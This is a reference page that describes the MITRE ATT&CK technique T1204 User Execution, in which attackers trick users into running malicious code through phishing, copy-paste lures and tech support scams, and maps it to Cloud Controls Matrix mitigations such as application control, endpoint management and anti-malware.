1. Home
  2. ATT&CK Techniques
  3. T1204 User Execution

T1204 User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.

While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Adversaries may also deceive users into performing actions such as:

  • Enabling Remote Access Tools, allowing direct control of the system to the adversary
  • Running malicious JavaScript in their browser, allowing adversaries to Steal Web Session Cookies(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
  • Downloading and executing malware for User Execution
  • Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)

For example, tech support scams can be facilitated through Phishing, vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or Remote Access Tools.(Citation: Telephone Attack Delivery)

View in MITRE ATT&CK®

CSA CCM Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
AIS-08 API Security mitigates T1204 User Execution
Comments
This control implements measures to secure APIs. Using application control and monitoring for and blocking malicious API calls can help prevent user execution of malware via APIs in cloud consoles.
References
    I&S-04 OS Hardening and Base Controls mitigates T1204 User Execution
    Comments
    This control implements secure configuration best practices for hardening cloud platforms to mitigate adversary exploitation and abuse of system functionality. Application controls can help prevent the running of executables masquerading as other files.
    References
      UEM-05 Endpoint Management mitigates T1204 User Execution
      Comments
      This control provides for the implementation of best practices for endpoint management. Malicious executables can be prevented from running by implementing application control, script blocking, and other execution prevention mechanisms.
      References
        UEM-09 Anti-Malware Detection and Prevention mitigates T1204 User Execution
        Comments
        This control describes the implementation of endpoint security, including anti-malware software, to mitigate the risk of exploitation by threat actors. The implementation guidance provides several examples of that the technical measures under Anti-Malware should aid with preventing which include: Scan installed software and system data content to identify and remove unauthorized code/software. Prohibit the use of installation of unauthorized software. Restricting on obtaining malicious data and software from external networks. Endpoint removable media management.
        References
          UEM-14 Third-Party Endpoint Security Posture mitigates T1204 User Execution
          Comments
          This control provides for the implementation of best practices for third-party endpoint management. Malicious executables can be prevented from running by implementing application control, script blocking, and other execution prevention mechanisms.
          References

            ATT&CK Subtechniques

            Technique ID Technique Name Number of Mappings
            T1204.003 Malicious Image 3